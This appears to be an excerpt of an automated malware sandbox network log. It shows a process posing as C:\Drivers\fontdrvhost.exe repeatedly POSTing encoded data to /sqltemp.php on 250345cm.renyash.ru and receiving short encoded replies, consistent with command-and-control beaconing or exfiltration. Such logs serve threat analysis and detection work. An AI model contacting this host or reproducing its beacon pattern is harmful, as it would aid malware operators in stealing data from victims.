Jan 1, 2025 14:52:37.308198929 CET	1012	OUT	Data Raw: 53 54 5a 56 54 5c 54 55 58 56 52 59 56 5c 59 55 5b 53 54 5e 55 5e 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: STZVT\TUXVRYV\YU[ST^U^PTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-&/. <.3?;:-V '+9=$X#!/Z(%C1<#R,&Y.,Y-5
Jan 1, 2025 14:52:37.438461065 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:37.688648939 CET	810	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VtNvD0%2FPiWoydBcMa4tM5gQhzM7D%2BsA7VnSvr7F202zTUj43%2FROvaVcIYa7w4WieKX9s7LKY8SDfWFvk8pI%2BncSOZPgNnhwcKA%2B%2FPkYnimG8Pf40OLk4KM4ePrHFw9b010QxppvM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fda9ab9d6a5b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5280&min_rtt=1763&rtt_var=7695&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=48831&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49790	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:37.806979895 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:52:38.152055979 CET	1012	OUT	Data Raw: 53 50 5f 5c 54 5b 51 55 58 56 52 59 56 5b 59 56 5b 5a 54 5d 55 5f 50 5b 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SP_\T[QUXVRYV[YV[ZT]U_P[Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-0<% =%=#,)" ;+(== \42<*(9D$/49&Y.,Y-)
Jan 1, 2025 14:52:38.291757107 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:38.547609091 CET	804	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TJPEqPFECk2AWQOoouqw9yMcanfEFtPZJgUWbhgQWr%2B8QA2EWYMWTpx%2BnMcCNuaGWV0MhldNVF2A8kKKQIrCAB46wgiV6UBWdmv2Plt427kNNxv4Wt1U7GjHFXpBsXEcN6bmTg%2Bf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fdaf0ee85e6b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3431&min_rtt=1648&rtt_var=4185&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=91725&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49791	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:38.667593956 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:39.026979923 CET	1012	OUT	Data Raw: 53 54 5f 51 54 5c 51 50 58 56 52 59 56 50 59 56 5b 53 54 5f 55 5f 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: ST_QT\QPXVRYVPYV[ST_U_PZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.0%X Y-\0+;" - _(9V> "+[<!D2,.*&Y.,Y-
Jan 1, 2025 14:52:39.136480093 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:39.393894911 CET	809	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vdcT2l4jTWy7uOmvAH%2FntA509eDgIlQE4iMTlWpTWOULFMta1ZIv4eh3hSyr0tZot96Ij71ZKB1%2Fb6cxwCgoGHid0aWKQu%2FdrQMd1tu%2FMC2jP9NmYynsR8r3nEqVAWGduRT%2BYkcI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fdb44b008cb3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7365&min_rtt=2029&rtt_var=11433&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=32648&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49792	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:39.513586044 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:39.872229099 CET	1012	OUT	Data Raw: 56 50 5f 5d 54 58 54 5d 58 56 52 59 56 51 59 50 5b 5a 54 5e 55 55 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VP_]TXT]XVRYVQYP[ZT^UUP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.^&?&"?!\'-'C/!S4.$^*9?U= #4+-2#.:&Y.,Y-
Jan 1, 2025 14:52:39.973073006 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:40.145785093 CET	804	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FsHJctO3HyMt0jH4uvqTZD5MV55LEhEOedFSe3M%2FpObSfgOs6T4Wa2WDF0jz4QqRQirLY2xwKDGrrCJuLSkSPqWwTxZDXAhk9zwsXs5DYZDgxkyMVCSPA%2FWA1ny8Ue66%2F3cx2ozg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fdb98f9fde99-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3470&min_rtt=1490&rtt_var=4519&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=84242&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49793	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:40.275779963 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:40.620811939 CET	1012	OUT	Data Raw: 56 57 5f 5c 51 58 51 50 58 56 52 59 56 58 59 52 5b 5d 54 58 55 5d 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VW_\QXQPXVRYVXYR[]TXU]P_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-$,: /$#/\=U4-:7W>< 7\<;-E&'U,:&Y.,Y-%
Jan 1, 2025 14:52:40.724850893 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:40.992047071 CET	799	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=flOvHcs95%2FsMyRFVlgHEsMI9hMNTwBVlcbiFPtJp6keOQPAx5PX1mgPeykRCuTxNBOwEqXTvo%2B1WkA%2FrF1cISNIsbkbLLdj2I7A2miOTIcqmDmCnesPwmxmCHylGYZrb43inriO2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fdbe4b53c472-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3173&min_rtt=1467&rtt_var=3964&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=96548&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a Data Ascii: 42W\X
Jan 1, 2025 14:52:41.079430103 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49794	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:41.198474884 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:41.543543100 CET	1012	OUT	Data Raw: 53 53 5f 54 54 50 51 56 58 56 52 59 56 5b 59 55 5b 5c 54 5b 55 59 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SS_TTPQVXVRYV[YU[\T[UYPZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-&/>"/)%.,%T7$+8.?#"3?+.%-&Y.,Y-)
Jan 1, 2025 14:52:41.642235041 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:41.825586081 CET	808	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2AAO8EwPi9gqT0nMBBD1lxxjLWdl%2BNwImsMi%2B%2FESH8Gul4u5sSjbftuFOSUQnu6xRcp8pHn3b8YD6grU2zSB3X7OknkxdXfxcDOqo%2BQRo%2B2RlksPHveBGhSShRTYKas8zZzGCdh0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fdc3ffbbc411-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3850&min_rtt=1667&rtt_var=4992&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=76303&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49795	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:41.947452068 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:42.292756081 CET	1012	OUT	Data Raw: 56 50 5f 51 51 5b 54 57 58 56 52 59 56 5a 59 51 5b 5a 54 51 55 58 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VP_QQ[TWXVRYVZYQ[ZTQUXPXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-'" ?&37C,!=<+9=/!!/Y("1/;T,:&Y.,Y--
Jan 1, 2025 14:52:42.403363943 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49796	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:42.662996054 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1824 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:43.011396885 CET	1824	OUT	Data Raw: 56 55 5f 57 51 5a 54 54 58 56 52 59 56 5f 59 50 5b 52 54 5c 55 5e 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VU_WQZTTXVRYV_YP[RT\U^PTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-3?54<-03.:7*))X$X 2Z+B&,-:&Y.,Y-9
Jan 1, 2025 14:52:43.107198954 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:43.291773081 CET	953	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KcGdgCY0%2Bb9t3mFN02VfDMA4T62ZyP8leR92dtu4cyB2ZGoxxI%2B4QpAE8hCWy6kqifuqHWr69qyJ07mw5Kr9AVQSceQY42owA%2BV6Rw09PMKzb0JVo8J0cjP2nkEg5dhvsRzOXxJ7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fdcd2a1f4406-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4372&min_rtt=1694&rtt_var=5991&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2143&delivery_rate=63154&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1f 26 0d 28 2e 32 50 25 54 30 13 2b 03 09 1f 25 10 21 00 2b 38 07 04 27 3d 3c 03 3e 39 3c 04 21 12 36 03 31 28 38 58 23 04 24 06 27 34 2b 59 05 1c 20 06 21 01 0e 13 28 2d 2f 5d 27 3c 2a 01 26 2e 2b 05 2a 2b 34 53 23 38 27 13 27 2d 15 05 2a 14 3f 0a 26 2c 2b 5b 2e 2f 2d 54 26 2a 2c 54 00 11 26 51 33 0f 30 59 20 27 28 5d 35 21 1b 1d 26 27 32 57 26 5a 3f 50 23 17 07 07 25 54 23 5b 22 33 3e 5b 26 15 00 00 37 3e 28 0b 3e 14 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&(.2P%T0+%!+8'=<>9<!61(8X#$'4+Y !(-/]'<&.++4S#8''-?&,+[./-T&,T&Q30Y '(]5!&'2W&Z?P#%T#["3>[&7>(>%S -H?WS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49797	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:42.775713921 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:43.120798111 CET	1012	OUT	Data Raw: 56 5f 5f 56 54 5b 54 5d 58 56 52 59 56 5c 59 57 5b 58 54 5d 55 54 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: V__VT[T]XVRYV\YW[XT]UTPZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z&?5["<&%.A,#[0<8)<X47(+1,?V-*&Y.,Y-5
Jan 1, 2025 14:52:43.221460104 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:43.482471943 CET	806	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NksHlKzi6mqFebjkLEYhkzf7Lk4cQFODBPYyEylnMD1gPkf0Dn6S2%2BT8i0nME%2FJXwD4xAJA0tOIng%2Fk5pFnvlTaVw1lMCJEv94%2FYPlvKzLA78cOcKJ4xys1KIBQlPVBM9tLphbiN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fdcddc096a57-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3704&min_rtt=1637&rtt_var=4749&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=80308&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49798	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:43.604300022 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:52:43.948909044 CET	1012	OUT	Data Raw: 53 53 5a 51 54 50 51 56 58 56 52 59 56 5b 59 55 5b 58 54 5f 55 5a 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SSZQTPQVXVRYV[YU[XT_UZPYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-'?4%Y$X;,:4-$X+))4Y4,+85D2Y :&Y.,Y-)
Jan 1, 2025 14:52:44.098159075 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:44.367451906 CET	798	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TYigkY3jbHFumNL79K9FlE5ndnabV2914N3gr3uHjIjlPLBVo9mGE7eyojxHh0UYQ9XO5DY4B27wYQYK3fjCwbCa1xtA7nKuqQ8WnXsGNMNQ7qYiNRX4oxxi3IK4KloIae0XnFFj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fdd35aa00f3e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3430&min_rtt=1563&rtt_var=4320&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=88479&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49799	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:44.496001959 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:52:44.855182886 CET	1012	OUT	Data Raw: 53 50 5f 53 51 5c 51 50 58 56 52 59 56 5a 59 50 5b 5b 54 59 55 5a 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SP_SQ\QPXVRYVZYP[[TYUZPTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X'Y9] Y"0-+.>7='=77+;1?#R::&Y.,Y--
Jan 1, 2025 14:52:44.939821959 CET	25	IN	HTTP/1.1 100 Continue
